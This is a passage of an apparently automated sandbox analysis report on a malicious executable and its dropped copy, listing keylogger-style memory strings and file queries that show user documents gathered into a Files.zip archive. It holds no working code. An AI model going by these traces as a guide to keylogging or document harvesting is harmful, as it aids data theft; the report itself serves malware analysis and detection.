                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:57]<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3409059058.00000000052F0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:57]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 46:42]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:49]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:06]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FC:\Users\user\AppData\Local\Adobe753D193B28082F181D0714131933073714:46:27]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:51]<<Program Manager>>(
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :47:14]<<Program Manager
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:50]<<Program Managerr d=arguments[c];if(d)for(var e in d)Object.prototype.hasOwnProperty.call(d,e)&&(a[e]=d[e])}return a};ha("Object.assign",function(a){return a||na});
                    Source: XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :47:50]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:39]<<Program Manager
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7:09]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:14]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001214000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:27]..Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmp, KeyDatawIMKYJdN.txt.14.drBinary or memory string: [14:47:40]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:30]<<Program Manager>>
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AFWAAFRXKO.docx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AFWAAFRXKO.docx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AIXACVYBSB.pdf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AIXACVYBSB.pdf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AIXACVYBSB.xlsx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AIXACVYBSB.xlsx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\KATAXZVCPS.pdf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\LSBIHQFDVT.xlsx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\MNULNCRIYC.xlsx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\MNULNCRIYC.xlsx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\PSAMNLJHZW.docx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QLSSZNHVJI.pdf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\VWDFPKGDUF.xlsx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.xlsx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.xlsx VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZSSZYEFYMU.docx VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\XgbXowhljC.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AFWAAFRXKO.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AFWAAFRXKO.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AFWAAFRXKO.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AFWAAFRXKO.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AIXACVYBSB.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AIXACVYBSB.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AIXACVYBSB.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AIXACVYBSB.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\KATAXZVCPS.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\KATAXZVCPS.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\LSBIHQFDVT.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\LSBIHQFDVT.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\LSBIHQFDVT.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\LSBIHQFDVT.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\MNULNCRIYC.xlsx VolumeInformation
